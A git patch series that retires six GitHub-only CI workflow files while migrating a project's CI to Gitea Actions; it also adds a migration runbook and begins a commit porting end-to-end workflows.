- echo "" - echo "If the match is a false positive (test fixture, docs example," - echo "or this workflow's own regex literals): use a clearly-fake" - echo "placeholder like ghs_EXAMPLE_DO_NOT_USE that doesn't satisfy" - echo "the length suffix, OR add the file path to the SELF exclude" - echo "list in this workflow with a short reason." - echo "" - echo "Mirror of the regex set lives in the runtime's bundled" - echo "pre-commit hook (molecule-ai-workspace-runtime:" - echo "molecule_runtime/scripts/pre-commit-checks.sh) — keep aligned." - exit 1 - fi - - echo "✓ No credential-shaped strings in this change." From f0745619d252b023dff8da6eb5b4145fa1a86fb4 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:12:29 -0700 Subject: [PATCH 3/7] =?UTF-8?q?ci:=20retire=206=20.github/workflows=20GitH?= =?UTF-8?q?ub-only=20files=20+=20add=20migration=20runbook=20(RFC=20intern?= =?UTF-8?q?al#219=20=C2=A71,=20Category=20B)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 + PR#378 (Cat A). These six .github/workflows files depend on GitHub-specific surface that Gitea does not provide: - auto-tag-runtime.yml — superseded by .gitea/publish-runtime-autobump.yml for patch bumps. Release:minor/major label-driven bumps are lost; follow-up issue suggested if anyone uses them. - branch-protection-drift.yml — drift_check.sh + apply.sh target Molecule-AI/molecule-core via `gh api` against GitHub's branch-protection schema. Gitea's schema differs; rebuilding is out of scope. Follow-up issue needed. - check-merge-group-trigger.yml — file's own header documents this is a structural no-op on Gitea (no merge queue, no `merge_group:` event type, no gh-readonly-queue refs). - codeql.yml — file's own header documents CodeQL Action incompatibility (github/codeql-action hits api.github.com bundle endpoints not implemented by Gitea). Per Hongming decision 2026-05-07 task #156 CodeQL is non-blocking until Gitea-compatible SAST lands. - pr-guards.yml — file's own header documents that Gitea has no `gh pr merge --auto` primitive; guard is a no-op. Branch protection on main doesn't require the pr-guards check name. - promote-latest.yml — uses imjasonh/setup-crane against ghcr.io, which was retired during the 2026-05-06 migration in favor of ECR (per canary-verify.yml header notes). Workflow has nothing left to retag. Also adds runbooks/gitea-actions-migration-checklist.md documenting: - Four-surface audit pattern (feedback_gitea_actions_migration_audit_pattern) - Category A/B/C/D file lists with rationale - Verification steps after all sweep PRs land - Cross-link to follow-up issues (label-driven bumps, Gitea-compatible drift detection, ECR-based promote) Branch protection check: required status checks on main are only `Secret scan / Scan diff for credential-shaped strings (pull_request)` and `sop-tier-check / tier-check (pull_request)`. No deleted file's job name appears in required_status_checks. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go. 
Cross-links: - RFC: molecule-ai/internal#219 - Companion: PR#372 (ci.yml port), PR#378 (Cat A mirrored deletions) Co-Authored-By: Claude Opus 4.7 (1M context) --- .github/workflows/auto-tag-runtime.yml | 138 ------------------ .github/workflows/branch-protection-drift.yml | 111 -------------- .../workflows/check-merge-group-trigger.yml | 48 ------ .github/workflows/codeql.yml | 136 ----------------- .github/workflows/pr-guards.yml | 63 -------- .github/workflows/promote-latest.yml | 85 ----------- runbooks/gitea-actions-migration-checklist.md | 112 ++++++++++++++ 7 files changed, 112 insertions(+), 581 deletions(-) delete mode 100644 .github/workflows/auto-tag-runtime.yml delete mode 100644 .github/workflows/branch-protection-drift.yml delete mode 100644 .github/workflows/check-merge-group-trigger.yml delete mode 100644 .github/workflows/codeql.yml delete mode 100644 .github/workflows/pr-guards.yml delete mode 100644 .github/workflows/promote-latest.yml create mode 100644 runbooks/gitea-actions-migration-checklist.md diff --git a/.github/workflows/auto-tag-runtime.yml b/.github/workflows/auto-tag-runtime.yml deleted file mode 100644 index 5ba8257d..00000000 --- a/.github/workflows/auto-tag-runtime.yml +++ /dev/null @@ -1,138 +0,0 @@ -name: auto-tag-runtime - -# Auto-tag runtime releases on every merge to main that touches workspace/. -# This is the entry point of the runtime CD chain: -# -# merge PR → auto-tag-runtime (this) → publish-runtime → cascade → template -# image rebuilds → repull on hosts. -# -# Default bump is patch. Override via PR label `release:minor` or -# `release:major` BEFORE merging — the label is read off the merged PR -# associated with the push commit. -# -# Skips when: -# - The push isn't to main (other branches don't auto-release). -# - The merge commit message contains `[skip-release]` (escape hatch -# for cleanup PRs that touch workspace/ but shouldn't ship). - -on: - push: - branches: [main] - paths: - - "workspace/**" - - "scripts/build_runtime_package.py" - - ".github/workflows/auto-tag-runtime.yml" - - ".github/workflows/publish-runtime.yml" - -permissions: - contents: write # to push the new tag - pull-requests: read # to read labels off the merged PR - -concurrency: - # Serialize tag bumps so two near-simultaneous merges can't both think - # they're 0.1.6 and race to push the same tag. - group: auto-tag-runtime - cancel-in-progress: false - -jobs: - tag: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - with: - fetch-depth: 0 # need full tag history for `git describe` / sort - - - name: Skip when commit asks - id: skip - run: | - MSG=$(git log -1 --format=%B "${{ github.sha }}") - if echo "$MSG" | grep -qiE '\[skip-release\]|\[no-release\]'; then - echo "skip=true" >> "$GITHUB_OUTPUT" - echo "Commit message contains [skip-release] — no tag will be created." - else - echo "skip=false" >> "$GITHUB_OUTPUT" - fi - - - name: Determine bump kind from PR label - id: bump - if: steps.skip.outputs.skip != 'true' - env: - # Gitea-shape token (act_runner forwards GITHUB_TOKEN as a - # short-lived per-run secret with read access to this repo). - # We hit `/api/v1/repos/.../pulls?state=closed` directly - # because `gh pr list` calls Gitea's GraphQL endpoint, which - # returns HTTP 405 (issue #75 / post-#66 sweep). 
- GITEA_TOKEN: ${{ github.token }} - REPO: ${{ github.repository }} - GITEA_API_URL: ${{ github.server_url }}/api/v1 - PUSH_SHA: ${{ github.sha }} - run: | - # Find the merged PR whose merge_commit_sha matches this push. - # Gitea's `/repos/{owner}/{repo}/pulls?state=closed` returns - # PRs sorted newest-first; we paginate up to 50 and jq-filter - # on `merge_commit_sha == PUSH_SHA`. Bounded — auto-tag fires - # per push to main, so the matching PR is always among the - # most recent closures. 50 is comfortably more than the - # ~10-20 staging→main promotes that close in any reasonable - # window. - set -euo pipefail - PRS_JSON=$(curl --fail-with-body -sS \ - -H "Authorization: token ${GITEA_TOKEN}" \ - -H "Accept: application/json" \ - "${GITEA_API_URL}/repos/${REPO}/pulls?state=closed&sort=newest&limit=50" \ - 2>/dev/null || echo "[]") - PR=$(printf '%s' "$PRS_JSON" \ - | jq -c --arg sha "$PUSH_SHA" \ - '[.[] | select(.merged_at != null and .merge_commit_sha == $sha)] | .[0] // empty') - if [ -z "$PR" ] || [ "$PR" = "null" ]; then - echo "No merged PR found for ${PUSH_SHA} — defaulting to patch bump." - echo "kind=patch" >> "$GITHUB_OUTPUT" - exit 0 - fi - # Gitea returns labels under `.labels[].name`, same shape as - # GitHub's REST. The previous `gh pr list --json number,labels` - # output was identical; jq filter unchanged. - LABELS=$(printf '%s' "$PR" | jq -r '.labels[]?.name // empty') - if echo "$LABELS" | grep -qx 'release:major'; then - echo "kind=major" >> "$GITHUB_OUTPUT" - elif echo "$LABELS" | grep -qx 'release:minor'; then - echo "kind=minor" >> "$GITHUB_OUTPUT" - else - echo "kind=patch" >> "$GITHUB_OUTPUT" - fi - - - name: Compute next version from latest runtime-v* tag - id: version - if: steps.skip.outputs.skip != 'true' - run: | - # Find the highest runtime-vX.Y.Z tag. `sort -V` handles semver - # ordering; `grep` filters to the right tag prefix. - LATEST=$(git tag --list 'runtime-v*' | sort -V | tail -1) - if [ -z "$LATEST" ]; then - # No prior tag — start the runtime line at 0.1.0. - CURRENT="0.0.0" - else - CURRENT="${LATEST#runtime-v}" - fi - MAJOR=$(echo "$CURRENT" | cut -d. -f1) - MINOR=$(echo "$CURRENT" | cut -d. -f2) - PATCH=$(echo "$CURRENT" | cut -d. -f3) - case "${{ steps.bump.outputs.kind }}" in - major) MAJOR=$((MAJOR+1)); MINOR=0; PATCH=0;; - minor) MINOR=$((MINOR+1)); PATCH=0;; - patch) PATCH=$((PATCH+1));; - esac - NEW="$MAJOR.$MINOR.$PATCH" - echo "current=$CURRENT" >> "$GITHUB_OUTPUT" - echo "new=$NEW" >> "$GITHUB_OUTPUT" - echo "Bumping runtime $CURRENT → $NEW (${{ steps.bump.outputs.kind }})" - - - name: Push new tag - if: steps.skip.outputs.skip != 'true' - run: | - NEW_TAG="runtime-v${{ steps.version.outputs.new }}" - git config user.name "github-actions[bot]" - git config user.email "41898282+github-actions[bot]@users.noreply.github.com" - git tag -a "$NEW_TAG" -m "runtime $NEW_TAG (auto-bump from ${{ steps.bump.outputs.kind }})" - git push origin "$NEW_TAG" - echo "Pushed $NEW_TAG — publish-runtime workflow will fire on the tag." diff --git a/.github/workflows/branch-protection-drift.yml b/.github/workflows/branch-protection-drift.yml deleted file mode 100644 index 2a782405..00000000 --- a/.github/workflows/branch-protection-drift.yml +++ /dev/null @@ -1,111 +0,0 @@ -name: branch-protection drift check - -# Catches out-of-band edits to branch protection (UI clicks, manual gh -# api PATCH from a one-off ops session) by comparing live state against -# tools/branch-protection/apply.sh's desired state every day. 
Fails the -# workflow when they drift; the failure is the signal. -# -# When it fails: re-run apply.sh to put the live state back to the -# script's intent, OR update apply.sh to encode the new intent and -# commit. Either way the script is the source of truth. - -on: - schedule: - # 14:00 UTC daily. Off-hours for most teams; gives a fresh signal - # at the start of every working day. - - cron: '0 14 * * *' - workflow_dispatch: - pull_request: - branches: [staging, main] - paths: - - 'tools/branch-protection/**' - - '.github/workflows/**' - - '.github/workflows/branch-protection-drift.yml' - -permissions: - contents: read - -jobs: - drift: - name: Branch protection drift - runs-on: ubuntu-latest - timeout-minutes: 5 - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - - # Token strategy by trigger: - # - # - schedule (daily canary): hard-fail when the admin token is - # missing. This is the *only* trigger where silent soft-skip is - # dangerous — a missing secret on the cron run means the drift - # gate has effectively disappeared with no human in the loop to - # notice. Per feedback_schedule_vs_dispatch_secrets_hardening.md - # the rule is "schedule/automated triggers must hard-fail". - # - # - pull_request (touching tools/branch-protection/**): soft-skip - # with a prominent warning. A PR cannot retroactively drift the - # live state — drift happens *between* PRs (UI clicks, manual - # gh api PATCH) and is the schedule's job to catch. The PR-time - # gate would only catch typos in apply.sh, which the apply.sh - # *_payload unit tests catch better. A human is reviewing the - # PR and will see the warning in the workflow log. - # - # - workflow_dispatch (operator one-off): soft-skip with warning, - # so an operator can run a diagnostic without configuring the - # secret first. - - name: Verify admin token present (hard-fail on schedule only) - env: - GH_TOKEN_FOR_ADMIN_API: ${{ secrets.GH_TOKEN_FOR_ADMIN_API }} - run: | - if [[ -n "$GH_TOKEN_FOR_ADMIN_API" ]]; then - echo "GH_TOKEN_FOR_ADMIN_API present — drift_check will run with admin scope." - exit 0 - fi - if [[ "${{ github.event_name }}" == "schedule" ]]; then - echo "::error::GH_TOKEN_FOR_ADMIN_API secret missing on the daily canary." >&2 - echo "" >&2 - echo "The schedule run is the SoT for branch-protection drift detection." >&2 - echo "Without admin scope it silently passes, hiding any out-of-band edits." >&2 - echo "Set GH_TOKEN_FOR_ADMIN_API at Settings → Secrets and variables → Actions." >&2 - exit 1 - fi - echo "::warning::GH_TOKEN_FOR_ADMIN_API secret missing — drift_check will be SKIPPED." - echo "::warning::PR drift checks need repo-admin scope to read /branches/:b/protection." - echo "::warning::This is non-fatal: the daily schedule run is the canonical drift gate." - echo "SKIP_DRIFT_CHECK=1" >> "$GITHUB_ENV" - - - name: Run drift check - if: env.SKIP_DRIFT_CHECK != '1' - env: - # Repo-admin scope, needed for /branches/:b/protection. - GH_TOKEN: ${{ secrets.GH_TOKEN_FOR_ADMIN_API }} - run: bash tools/branch-protection/drift_check.sh - - # Self-test the parity script before running it on the real - # workflows — pins the script's classification logic against - # synthetic safe/unsafe/missing/unsafe-mix/matrix fixtures so a - # regression in the script can't false-pass on the production - # workflow audit. Cheap (~0.5s); always runs. 
- - name: Self-test check-name parity script - run: bash tools/branch-protection/test_check_name_parity.sh - - # Check-name parity gate (#144 / saved memory - # feedback_branch_protection_check_name_parity). - # - # drift_check.sh asserts the live branch protection matches what - # apply.sh would set; check_name_parity.sh closes the orthogonal - # gap: it asserts every required check name in apply.sh maps to a - # workflow job whose "always emits this status" shape is intact. - # - # The two checks fail in different scenarios: - # - # - drift_check fails → live state was rewritten out-of-band - # (UI click, manual PATCH). - # - check_name_parity fails → an apply.sh required name has no - # emitter, OR the emitting workflow has a top-level paths: - # filter without per-step if-gates (the silent-block shape). - # - # Cheap (~1s); runs without the admin token because it only reads - # apply.sh + .github/workflows/ from the checkout. - - name: Run check-name parity gate - run: bash tools/branch-protection/check_name_parity.sh diff --git a/.github/workflows/check-merge-group-trigger.yml b/.github/workflows/check-merge-group-trigger.yml deleted file mode 100644 index 7d65a526..00000000 --- a/.github/workflows/check-merge-group-trigger.yml +++ /dev/null @@ -1,48 +0,0 @@ -name: Check merge_group trigger on required workflows - -# Pre-merge guard against the deadlock pattern where a workflow whose -# check is in `required_status_checks` lacks a `merge_group:` trigger. -# Without it, GitHub merge queue stalls forever in AWAITING_CHECKS -# because the required check can't fire on `gh-readonly-queue/...` refs. -# -# This workflow: -# 1. Lists required status checks on the branch protection rule for `staging` -# 2. For each required check, finds the workflow that produces it (by job -# name match) -# 3. Fails if any such workflow lacks `merge_group:` in its triggers -# -# Reasoning for staging-only: main has its own CI gating model (PR review), -# but staging is what the merge queue runs on, so it's the trigger that -# matters. -# -# Gitea stub: Gitea has no merge queue feature and no `merge_group:` -# event type. The linter would find no `merge_group:` triggers to verify -# (they don't exist on Gitea), so the lint is vacuously satisfied. -# Converting to a no-op stub keeps the workflow+job name stable for any -# commit-status context consumers while eliminating the `gh api` call -# that fails against Gitea's REST surface (#75 / PR-D). - -on: - pull_request: - paths: - - '.github/workflows/**.yml' - - '.github/workflows/**.yaml' - push: - branches: [staging, main] - paths: - - '.github/workflows/**.yml' - - '.github/workflows/**.yaml' - -jobs: - check: - name: Required workflows have merge_group trigger - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - name: Gitea no-op (merge queue not applicable) - run: | - echo "Gitea Actions — merge queue not supported; no-op." - echo "On GitHub this workflow lints that required-check workflows declare" - echo "merge_group: triggers to prevent queue deadlock. On Gitea that" - echo "constraint is inapplicable — all workflows pass vacuously." diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml deleted file mode 100644 index dec301a6..00000000 --- a/.github/workflows/codeql.yml +++ /dev/null @@ -1,136 +0,0 @@ -name: CodeQL - -# Stub workflow — CodeQL Action is structurally incompatible with Gitea -# Actions (post-2026-05-06 SCM migration off GitHub). -# -# Why this is a stub, not a real CodeQL run: -# -# 1. 
github/codeql-action/init@v4 hits api.github.com endpoints -# (CodeQL CLI bundle download + query-pack registry + telemetry) -# that Gitea 1.22.x does NOT proxy. The act_runner has -# GITHUB_SERVER_URL=https://git.moleculesai.app correctly set -# (per saved memory feedback_act_runner_github_server_url and -# /config.yaml on the operator host), but the Gitea API surface -# simply does not implement the codeql-action bundle endpoints. -# Observed in run 1d/3101 (2026-05-07): "::error::404 page not -# found" inside the Initialize CodeQL step, before any analysis. -# -# 2. PR #35 attempted to mark `continue-on-error: true` at the JOB -# level (correct YAML structure). Gitea 1.22.6 does NOT propagate -# job-level continue-on-error to the commit-status API — every -# matrix leg still posts `failure` to the status surface, which -# keeps OVERALL=failure on every push to main + staging and -# blocks visual auto-promote signals (#156). -# -# 3. Hongming policy decision (2026-05-07, task #156): CodeQL is -# ADVISORY, not blocking, on Gitea Actions. We do not block PR -# merge or staging→main promotion on CodeQL findings until we -# have a Gitea-compatible static-analysis pipeline. -# -# What this stub preserves: -# -# - Workflow name `CodeQL` (referenced by auto-promote-staging.yml -# line 67 as a workflow_run gate — must stay stable). -# - Job name template `Analyze (${{ matrix.language }})` and the -# 3-leg matrix (go, javascript-typescript, python). Branch -# protection / required-check parity (#144) keys on these -# exact context names. -# - merge_group + push + pull_request + schedule triggers, so the -# merge-queue check name still resolves (per saved memory -# feedback_branch_protection_check_name_parity). -# -# Re-enabling real analysis (future work): -# -# - Option A: self-hosted Semgrep / OpenGrep via a custom action -# that doesn't hit api.github.com. Tracked behind #156 follow-up. -# - Option B: Sonatype Nexus IQ or similar, called from a step -# that uses the Gitea-issued token only. -# - Option C: re-host this workflow on a small GitHub mirror used -# ONLY for SAST (push-mirrored from Gitea). Acceptable trade-off -# if/when payment is restored on a non-suspended GitHub org — -# but per saved memory feedback_no_single_source_of_truth, we -# should design for multi-vendor backup, not GitHub-only SAST. -# -# Until one of those lands, this stub keeps commit-status green so -# the auto-promote chain isn't permanently red on a tool we cannot -# actually run. -# -# Security policy: ADVISORY. We accept the residual risk of un-scanned -# pushes during this window. Compensating controls in place: -# - secret-scan.yml runs on every push (active, blocks on hits) -# - block-internal-paths.yml blocks forbidden file paths -# - lint-curl-status-capture.yml catches one specific class of bug -# - branch-protection-drift.yml + the merge_group required-checks -# parity keep the gate surface stable -# These are not equivalent to CodeQL coverage. Status of the -# replacement plan is tracked in #156. - -on: - push: - branches: [main, staging] - pull_request: - branches: [main, staging] - # Required so the matrix legs emit a real result on the queued - # commit instead of a false-green when merge queue is enabled. - # Per saved memory feedback_branch_protection_check_name_parity: - # path-filtered / matrix workflows MUST emit the protected name - # via a job that always runs. - merge_group: - types: [checks_requested] - schedule: - # Weekly heartbeat. 
Cheap on a stub (the no-op job is ~5s) but - # keeps the workflow visible in Gitea's Actions UI so the next - # operator notices it's a stub instead of a missing surface. - - cron: '30 1 * * 0' - -# Workflow-level concurrency: only one stub run per branch/PR at a -# time. cancel-in-progress: false because a quick follow-up push -# shouldn't kill an in-flight run — even though the stub is fast, -# the contract should match a real CodeQL run for when we re-enable. -concurrency: - group: codeql-${{ github.ref }} - cancel-in-progress: false - -permissions: - actions: read - contents: read - # No security-events: write — we don't call the upload API anyway, - # GHAS isn't on Gitea. - -jobs: - analyze: - # Job NAME shape is load-bearing — auto-promote-staging.yml + - # branch protection both key on `Analyze (${{ matrix.language }})`. - # Do NOT rename without coordinating both surfaces. - name: Analyze (${{ matrix.language }}) - runs-on: ubuntu-latest - timeout-minutes: 5 - - strategy: - fail-fast: false - matrix: - language: [go, javascript-typescript, python] - - steps: - # Single-step stub: log the policy decision + emit success. - # Exit 0 explicitly so the commit-status API records `success` - # for each of the three matrix legs. - - name: CodeQL stub (advisory, non-blocking on Gitea) - shell: bash - run: | - set -euo pipefail - cat <> "$GITHUB_OUTPUT" - echo "::notice::Gitea Actions detected — auto-merge gating is not applicable here (Gitea has no --auto merge primitive). Job will no-op." - else - echo "is_gitea=false" >> "$GITHUB_OUTPUT" - fi - - - name: Disable auto-merge (GitHub only) - if: steps.host.outputs.is_gitea != 'true' - env: - GH_TOKEN: ${{ github.token }} - PR: ${{ github.event.pull_request.number }} - REPO: ${{ github.repository }} - NEW_SHA: ${{ github.sha }} - run: | - set -eu - gh pr merge "$PR" --disable-auto -R "$REPO" || true - gh pr comment "$PR" -R "$REPO" --body "🔒 Auto-merge disabled — new commit (\`${NEW_SHA:0:7}\`) pushed after auto-merge was enabled. The merge queue locks SHAs at entry, so subsequent pushes can race. Verify the new commit and re-enable with \`gh pr merge --auto\`." - - - name: Gitea no-op - if: steps.host.outputs.is_gitea == 'true' - run: echo "Gitea Actions — auto-merge gating not applicable; no-op (job intentionally green so branch protection's required-check name lands SUCCESS)." diff --git a/.github/workflows/promote-latest.yml b/.github/workflows/promote-latest.yml deleted file mode 100644 index e16027c3..00000000 --- a/.github/workflows/promote-latest.yml +++ /dev/null @@ -1,85 +0,0 @@ -name: promote-latest - -# Manually retag ghcr.io/molecule-ai/platform:staging- → :latest -# (and the same for the tenant image). Use this to: -# -# 1. Promote a :staging- to prod before the canary fleet is live -# (one-off during the initial rollout). -# 2. Roll back :latest to a prior known-good digest after a bad -# promotion slipped past canary (use scripts/rollback-latest.sh -# for a local / emergency path; this workflow is for scheduled -# or from-browser promotions). -# -# Running this workflow needs no extra secrets — GitHub's default -# GITHUB_TOKEN has write:packages for repo-owned GHCR images, which -# is all we need for a remote retag via `crane tag`. - -on: - workflow_dispatch: - inputs: - sha: - description: 'Short sha to promote (e.g. 4c1d56e). Must match an existing :staging- tag.' 
- required: true - type: string - -permissions: - contents: read - packages: write - -env: - IMAGE_NAME: ghcr.io/molecule-ai/platform - TENANT_IMAGE_NAME: ghcr.io/molecule-ai/platform-tenant - -jobs: - promote: - runs-on: ubuntu-latest - steps: - - uses: imjasonh/setup-crane@6da1ae018866400525525ce74ff892880c099987 # v0.5 - - - name: GHCR login - run: | - echo "${{ secrets.GITHUB_TOKEN }}" \ - | crane auth login ghcr.io -u "${{ github.actor }}" --password-stdin - - - name: Retag platform image - run: | - set -eu - SRC="${IMAGE_NAME}:staging-${{ inputs.sha }}" - if ! crane digest "$SRC" >/dev/null 2>&1; then - echo "::error::$SRC not found in registry — double-check the sha." - exit 1 - fi - EXPECTED=$(crane digest "$SRC") - crane tag "$SRC" latest - ACTUAL=$(crane digest "${IMAGE_NAME}:latest") - if [ "$ACTUAL" != "$EXPECTED" ]; then - echo "::error::retag digest mismatch (expected $EXPECTED, got $ACTUAL)" - exit 1 - fi - echo "OK ${IMAGE_NAME}:latest → $ACTUAL" - - - name: Retag tenant image - run: | - set -eu - SRC="${TENANT_IMAGE_NAME}:staging-${{ inputs.sha }}" - if ! crane digest "$SRC" >/dev/null 2>&1; then - echo "::error::$SRC not found — tenant image may not have built for this sha." - exit 1 - fi - EXPECTED=$(crane digest "$SRC") - crane tag "$SRC" latest - ACTUAL=$(crane digest "${TENANT_IMAGE_NAME}:latest") - if [ "$ACTUAL" != "$EXPECTED" ]; then - echo "::error::tenant retag digest mismatch" - exit 1 - fi - echo "OK ${TENANT_IMAGE_NAME}:latest → $ACTUAL" - - - name: Summary - run: | - { - echo "## :latest promoted to staging-${{ inputs.sha }}" - echo - echo "Both platform + tenant images retagged. Prod tenants" - echo "will auto-pull within their 5-min update cycle." - } >> "$GITHUB_STEP_SUMMARY" diff --git a/runbooks/gitea-actions-migration-checklist.md b/runbooks/gitea-actions-migration-checklist.md new file mode 100644 index 00000000..dd87d0c5 --- /dev/null +++ b/runbooks/gitea-actions-migration-checklist.md @@ -0,0 +1,112 @@ +# Gitea Actions migration checklist (molecule-core) + +Created 2026-05-11 as part of **RFC `molecule-ai/internal#219` §1** — the +sweep of `.github/workflows/*.yml` files in `molecule-core` after the +2026-05-06 GitHub → Gitea migration. Documents which workflows were +retired, which were ported, and the reasoning for each. + +The sweep used the four-surface audit pattern from saved memory +`feedback_gitea_actions_migration_audit_pattern`: + +1. **YAML** — drop `workflow_dispatch.inputs`, `merge_group`, + `environment:`. Adjust `runs-on:`. Set `env.GITHUB_SERVER_URL` + per `feedback_act_runner_github_server_url`. +2. **Cache** — verify `actions/cache@v4` / `upload-artifact` pin + compatibility with Gitea 1.22.x runner. +3. **Token** — auto-injected `GITHUB_TOKEN` works for same-repo + operations; cross-repo dispatch needs explicit secret. +4. **Docs** — top-of-file "Ported from .github/workflows/X.yml on + YYYY-MM-DD per RFC internal#219 §1 sweep" comment. + +Per RFC §1 contract, all ports land with `continue-on-error: true` on +every job to surface bugs without blocking; a follow-up PR flips +`continue-on-error: false` after triage. + +## Category A — already mirrored (deleted .github/ copy) + +These workflows had a working `.gitea/workflows/X.yml` twin at the time +of the sweep. The `.github/` copies were silently dead (Gitea Actions +in molecule-core only registers `.gitea/workflows/`) and have been +removed. 
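+
+A quick pre-delete spot-check (a sketch only, run from the repo root; the
+file list is the Category A table below) confirms each candidate really has
+a `.gitea/workflows/` twin before its `.github/` copy is removed:
+
+```bash
+# Sketch only: verify every Category A file has an active .gitea/ twin.
+for f in publish-runtime.yml secret-scan.yml; do
+  if [ -f ".gitea/workflows/$f" ]; then
+    echo "OK       $f has a .gitea/workflows/ twin"
+  else
+    echo "MISSING  .gitea/workflows/$f - do NOT delete the .github/ copy"
+  fi
+done
+```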
+ +| File | .gitea/ twin | +|---|---| +| `publish-runtime.yml` | `.gitea/workflows/publish-runtime.yml` (ported via issue #206) | +| `secret-scan.yml` | `.gitea/workflows/secret-scan.yml` | + +## Category B — GitHub-only, retired + +These workflows depend on GitHub-specific surface (merge queue, GitHub +auto-merge primitive, github.com REST API, GHCR registry, CodeQL action +that hits api.github.com bundle endpoints) that Gitea does not provide. +No equivalent Gitea-side workflow is needed; the underlying mechanism +either doesn't exist on Gitea or has been replaced by a different +pipeline. + +| File | Why retired | +|---|---| +| `auto-tag-runtime.yml` | Superseded by `.gitea/workflows/publish-runtime-autobump.yml` (auto-bump-on-workspace-edit). The autobump only does patch bumps; the deleted workflow supported `release:minor` / `release:major` PR-label-driven bumps. Follow-up issue should track restoring label-driven minor/major if anyone uses it. | +| `branch-protection-drift.yml` | Targets `Molecule-AI/molecule-core` on GitHub via `gh api /repos/.../branch-protection` — entirely GitHub-API specific. `tools/branch-protection/drift_check.sh` and `apply.sh` reference the GitHub schema (status_check_contexts, dismiss_stale_reviews, etc.) which differs from Gitea's `branch_protections` shape. Rebuilding for Gitea is out of scope for the RFC #219 sweep; follow-up issue needed for Gitea-compatible branch-protection drift detection. | +| `check-merge-group-trigger.yml` | The workflow's own header (lines 18-23) documents that it's vacuously satisfied on Gitea — Gitea has no merge queue, no `merge_group:` event type, no `gh-readonly-queue/...` refs. Nothing to lint. | +| `codeql.yml` | The workflow's own header (lines 3-67) documents that `github/codeql-action/init@v4` hits api.github.com bundle endpoints not implemented by Gitea (observed: `::error::404 page not found` in Initialize CodeQL step). Per Hongming decision 2026-05-07 (task #156): CodeQL is ADVISORY/non-blocking until a Gitea-compatible SAST pipeline lands. Replacement options (Semgrep self-host, Sonatype, GitHub-mirror-for-SAST) tracked in #156. | +| `pr-guards.yml` | The workflow's own header documents that Gitea has no `gh pr merge --auto` primitive — the guard is a structural no-op on Gitea. Branch protection on `main` does NOT reference any `pr-guards` check name; deletion is safe. | +| `promote-latest.yml` | Uses `imjasonh/setup-crane` against `ghcr.io/molecule-ai/platform` — the GHCR registry was retired during the 2026-05-06 Gitea migration (per `canary-verify.yml` header notes, the canonical tenant image moved to ECR `153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform-tenant`). The workflow can no longer find any image to retag. Follow-up issue suggested if an ECR-based retag promote is desired. | + +## Category C — ported to .gitea/ + +These workflows had real ongoing CI value but no Gitea-side equivalent. +Each was ported to `.gitea/workflows/X.yml` with: + +- `workflow_dispatch.inputs` removed (Gitea 1.22.6 parser rejects them — + per `feedback_gitea_workflow_dispatch_inputs_unsupported`) +- `merge_group:` trigger removed (no merge queue) +- `environment:` blocks removed (Gitea has no environments) +- `dorny/paths-filter@v4` replaced with inline `git diff` (per the + pattern established in PR#372 ci.yml port) +- `env.GITHUB_SERVER_URL: https://git.moleculesai.app` set at workflow + level (belt-and-suspenders for `actions/checkout` etc.) 
+- `continue-on-error: true` on every job (RFC §1 contract — surface + defects without blocking; follow-up PR flips after triage) +- Top-of-file header: "Ported from .github/workflows/X.yml on + YYYY-MM-DD per RFC internal#219 §1 sweep." + +See the C-1 / C-2 / C-3 sweep PRs for the file lists and per-file +adjustments. + +## Category D — parser-rejected (none for molecule-core) + +The RFC #219 §1 brief lists 7 workflows as parser-rejected (`audit-orphan-instances`, +`bake-thin-ami`, `bench-provision-time`, `cache-probe`, `deploy-pipeline`, +`e2e-tunnel-reboot`, `persona-author-check`). Verification against +molecule-core's tree (and the `docker logs molecule-gitea-1` parser-rejection +log) shows these workflows belong to other repos: + +- `audit-orphan-instances`, `bake-thin-ami`, `bench-provision-time`, + `deploy-pipeline`, `e2e-tunnel-reboot` live in `molecule-ai/molecule-controlplane` +- `cache-probe`, `persona-author-check` live in `molecule-ai/internal` + +For molecule-core, **Category D is empty**. + +## Verification + +After all sweep PRs land: + +```bash +# Should produce nothing. +ls .github/workflows/*.yml | grep -vF ci.yml + +# Should list 6 working workflows from the .gitea/ port directory + the +# C-1/C-2/C-3 ports. +ls .gitea/workflows/*.yml +``` + +Gitea Actions server should produce NO `[W] ignore invalid workflow` +lines for any `.gitea/workflows/X.yml` in molecule-core when commits +land on `main`: + +```bash +ssh root@5.78.80.188 'docker logs molecule-gitea-1 --since 10m 2>&1 \ + | grep "ignore invalid workflow" \ + | grep -i molecule-core' +# Expected: empty. +``` From 58f80f7e42399542a9b9af8ca12ba4d08b3dc233 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:23:30 -0700 Subject: [PATCH 4/7] =?UTF-8?q?ci:=20port=2010=20E2E=20workflows=20to=20.g?= =?UTF-8?q?itea/workflows/=20(RFC=20internal#219=20=C2=A71,=20Category=20C?= =?UTF-8?q?-2)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 (ci.yml port), PR#378 (Cat A), PR#379 (Cat B), PR#383 (Cat C-1 gates/lints). Ports 10 E2E-shaped workflow files from .github/workflows/ to .gitea/workflows/. Each port applies the four-surface audit pattern. Per RFC §1 contract: every job has `continue-on-error: true` so surfaced defects do not block PRs. Follow-up PR flips to false after triage. Files ported: - canary-staging.yml — every-30-min canary smoke against staging. Two `actions/github-script@v9` blocks (open-issue-on-failure + auto-close-on-success) replaced with curl calls to the Gitea REST API (/api/v1/repos/.../issues|comments). Same single-issue + comment-on-repeat semantics. - canary-verify.yml — post-publish image promote-to-:latest. Still uses workflow_run trigger; Gitea 1.22.6's support for that event is partial — flagged in the file header. If review confirms it doesn't fire, follow-up PR replaces with push-with-paths-filter on .gitea/workflows/publish-workspace-server-image.yml. Removed the `|| github.event_name == 'workflow_dispatch'` branch (this port drops workflow_dispatch). - continuous-synth-e2e.yml — 